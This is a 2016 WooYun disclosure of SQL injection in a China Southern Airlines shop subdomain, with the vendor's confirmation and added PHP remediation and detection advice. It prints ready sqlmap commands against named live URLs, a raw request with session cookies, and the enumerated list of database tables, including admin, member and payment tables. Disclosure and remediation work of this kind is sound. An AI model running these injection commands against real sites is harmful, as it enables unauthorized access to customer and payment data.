
Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0166527

Title: Bundle of SQL injection vulnerabilities on a China Southern Airlines site

Vendor: China Southern Airlines Company Limited

Author: 路人甲 (anonymous)

Submitted: 2016-01-01 09:37

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure timeline:

2016-01-01: Details sent to the vendor; awaiting vendor handling
2016-01-04: Vendor confirmed; details visible to the vendor only
2016-01-14: Details disclosed to core white hats and domain experts
2016-01-24: Details disclosed to regular white hats
2016-02-03: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

SQL injection; please fix.

Detailed description:

Injection point 1: the request is as follows

GET /shop/home/merchant.html?navigation_id=&query_value=1&shop_id=1 HTTP/1.1
Referer: http://csair.bluedoor.com.cn:80/
Cookie: PHPSESSID=puaje4o21ispsqe2ubasem0aj0; record_browse_goods_ob=WzYzLDEwOSw5MywxMDYsMTA0LDcwLDY0LDEwOCwxMjhd; JSESSIONID=8AE24271C05633302FDC8FB76E063B97; HMACCOUNT=B83CFD798577A510; Hm_lvt_cbc58f4d53b109e5f36067cf7682b337=1451540719,1451540802,1451540908,1451540938; Hm_lpvt_cbc58f4d53b109e5f36067cf7682b337=1451540938; WT-FPC=id=202.105.41.197-1071687936.30491534:lv=1451540973331:ss=1451540690024:fs=1451540690024:pn=5:vn=1
Host: csair.bluedoor.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


Screenshot:

1.jpg


Injection point 2: sqlmap.py -u "http://csair.bluedoor.com.cn:80/shop/goods/search.html?brand_id=all&page=2&payment_type=all&price=all&price_orderby=asc&query=1" --dbs --dbms="MySQL" -p query
Screenshot:

2.jpg


Injection point 3: sqlmap.py -u "http://csair.bluedoor.com.cn:80/shop/index.php/goods/search.html?query=1" --dbs --dbms="MySQL" -p query
Screenshot:

3.jpg


Proof of vulnerability:

Databases:
available databases [3]:
[*] csair
[*] csair_shop
[*] information_schema
[21:24:42] [INFO] fetching tables for database: 'csair'
[21:24:42] [INFO] the SQL query used returns 224 entries
Database: csair
[224 tables]
+-----------------------------------+
| v9_abnormal_log |
| v9_activities |
| v9_activities_address |
| v9_activities_collect |
| v9_activities_comment |
| v9_activities_exchange |
| v9_activities_join |
| v9_activities_photo |
| v9_activities_txt |
| v9_activity |
| v9_activity_goods |
| v9_admin |
| v9_admin_log |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_adtemplate |
| v9_adtemplate_ad_rotator |
| v9_adtemplate_ad_rotator_image |
| v9_adtemplate_column |
| v9_adtemplate_discount_ticket |
| v9_adtemplate_free_walker |
| v9_adtemplate_get_visa |
| v9_adtemplate_group_buying |
| v9_adtemplate_products_tab |
| v9_adtemplate_products_type |
| v9_adtemplate_rent_car |
| v9_adtemplate_rent_car_image |
| v9_adtemplate_select_hotel |
| v9_adtemplate_select_hotel_image |
| v9_adtemplate_service_products |
| v9_adtemplate_special_supply |
| v9_adtemplate_travel |
| v9_adtemplate_travel_image |
| v9_adtemplate_visa |
| v9_adtemplate_wap |
| v9_adtemplate_wap_products |
| v9_announce |
| v9_area |
| v9_area_image |
| v9_area_image2 |
| v9_area_month_recommend |
| v9_area_region |
| v9_area_region_recommend |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_check_email |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_draw_log |
| v9_edit_orderstart_log |
| v9_email_api_log |
| v9_email_subscription |
| v9_extend_setting |
| v9_favorite |
| v9_flight_api_log |
| v9_flight_order |
| v9_flight_order_flightinfos |
| v9_flight_order_passengerinfo |
| v9_footprint |
| v9_footprint_scenic |
| v9_game |
| v9_game_data |
| v9_hits |
| v9_home_album_category |
| v9_illegal_operation_log |
| v9_img_use |
| v9_integral_log |
| v9_ip_ban |
| v9_ipbanned |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_linkage |
| v9_linkman |
| v9_log |
| v9_login_log |
| v9_mail_add |
| v9_member |
| v9_member_active_flag |
| v9_member_blacklist |
| v9_member_checkticket_log |
| v9_member_detail |
| v9_member_exp_log |
| v9_member_follow |
| v9_member_group |
| v9_member_home_album |
| v9_member_home_pic |
| v9_member_journey_story |
| v9_member_journey_story_best |
| v9_member_journey_story_collect |
| v9_member_journey_story_comment |
| v9_member_journey_story_image2 |
| v9_member_journey_story_prize |
| v9_member_journey_story_region |
| v9_member_journey_story_share_log |
| v9_member_journey_story_vote_log |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_member_wallet |
| v9_menu |
| v9_message |
| v9_message_group_user |
| v9_message_shield |
| v9_message_theme |
| v9_model |
| v9_model_field |
| v9_module |
| v9_news |
| v9_news_data |
| v9_not_draw_user |
| v9_opinion |
| v9_order_csair_api_log |
| v9_order_goods |
| v9_order_info |
| v9_order_paybillno_log |
| v9_order_unionpay_api_log |
| v9_order_update_log |
| v9_order_wallet |
| v9_page |
| v9_passenger_info |
| v9_pay_account |
| v9_pay_log |
| v9_pay_of_order |
| v9_pay_payment |
| v9_pay_spend |
| v9_pay_update_log |
| v9_payment_log |
| v9_payment_update_log |
| v9_pd_infos |
| v9_pic_album |
| v9_pic_album_collect |
| v9_pic_album_photo |
| v9_pic_album_photo_address |
| v9_pic_album_photo_comment |
| v9_pic_album_photo_day |
| v9_picture |
| v9_picture_data |
| v9_plan |
| v9_plan_address |
| v9_plan_collect |
| v9_plan_comment |
| v9_plan_day |
| v9_plan_food |
| v9_plan_hotel |
| v9_plan_join |
| v9_plan_scenic |
| v9_plan_traffic |
| v9_position |
| v9_position_data |
| v9_post_orderstart_log |
| v9_poster |
| v9_poster_space |
| v9_product_comment |
| v9_product_likes |
| v9_products |
| v9_products2 |
| v9_products2__sorts |
| v9_products2_deptcitys |
| v9_products2_goodsorts |
| v9_products2_imgs |
| v9_products2_infos |
| v9_products2_schedules |
| v9_products2_stores |
| v9_products2_subjects |
| v9_products_imgs |
| v9_prov_city_area_street |
| v9_queue |
| v9_region |
| v9_region_area |
| v9_register_email_log |
| v9_release_point |
| v9_scenic |
| v9_scenic_image |
| v9_scenic_image2 |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_set_pd_log |
| v9_share |
| v9_site |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sync_logs |
| v9_tab |
| v9_tag |
| v9_template_bak |
| v9_theme |
| v9_theme_city |
| v9_times |
| v9_type |
| v9_update_email_log |
| v9_update_user_log |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_video_store |
| v9_wallet_api_log |
| v9_wallet_coupons |
| v9_wallet_coupons_operate_log |
| v9_wallet_get_coupons_log |
| v9_wap_type |
| v9_webservice_log |
| v9_workflow |
+-----------------------------------+

Remediation:

Adapt the fix to your business logic; you know it better than I do.

Copyright notice: when republishing, credit 路人甲@乌云 (WooYun) as the source.
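The remediation note above leaves the fix to the vendor. The pattern reported here (the `query` and `shop_id` request parameters reaching a MySQL query) is the classic concatenation defect, and the standard fix is a prepared statement. The following PHP is an added example, not code from the affected site (whose source is not on the page): it shows a concatenated search query beside its hardened form. The table and column names (`goods`, `id`, `name`, `price`, `shop_id`) and the connection details are assumptions, not values from the report.

```php
<?php
// Added example, not the affected site's code. Table/column names and the DSN
// are hypothetical; replace them with your own.

// Defective pattern: the request parameter is spliced into the SQL text, so
// whatever it contains is parsed as SQL. This is the class of bug the report
// describes; it is shown only so the contrast with the fixed version is clear.
function searchGoodsUnsafe(PDO $db, string $query): array
{
    $sql = "SELECT id, name, price FROM goods WHERE name LIKE '%" . $query . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed pattern: a prepared statement sends the parameter values separately
// from the SQL text, so their content is never interpreted as SQL. The integer
// parameter is bound with an explicit type, and LIKE metacharacters in the
// search term are escaped so user input cannot widen the match (MySQL's
// default ESCAPE character is the backslash, which addcslashes uses here).
function searchGoods(PDO $db, string $query, int $shopId): array
{
    $stmt = $db->prepare(
        'SELECT id, name, price FROM goods WHERE shop_id = :shop_id AND name LIKE :pattern'
    );
    $pattern = '%' . addcslashes($query, '%_\\') . '%';
    $stmt->bindValue(':shop_id', $shopId, PDO::PARAM_INT);
    $stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Request handling: validate shop_id as an integer before it reaches the
// query, and reject the request outright when it is not one.
$shopId = filter_input(INPUT_GET, 'shop_id', FILTER_VALIDATE_INT);
if ($shopId === false || $shopId === null) {
    http_response_code(400);
    exit('invalid shop_id');
}
$query = (string) ($_GET['query'] ?? '');

// Hypothetical connection; native server-side prepares are enforced so the
// parameters are never re-interpolated client-side.
$db = new PDO(
    'mysql:host=DB_HOST_PLACEHOLDER;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASSWORD_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

header('Content-Type: application/json');
echo json_encode(searchGoods($db, $query, $shopId));
```

The same change applies to every endpoint in the report: the `navigation_id`, `query_value` and `shop_id` parameters of the merchant page and the `query` parameter of the two search pages each need to be bound rather than concatenated. Because sqlmap enumerated 224 tables, including `v9_admin`, `v9_member` and order and payment logs, the detection side is worth a line as well: a single request whose `query` parameter yields hundreds of distinct tables over time, or a burst of requests with SQL keywords in that parameter, is the signature to alert on in the web server logs.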


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-04 00:08

Vendor reply:

Thanks for reporting the problem. The subsidiaries' websites need to be consolidated!!

Latest status:

None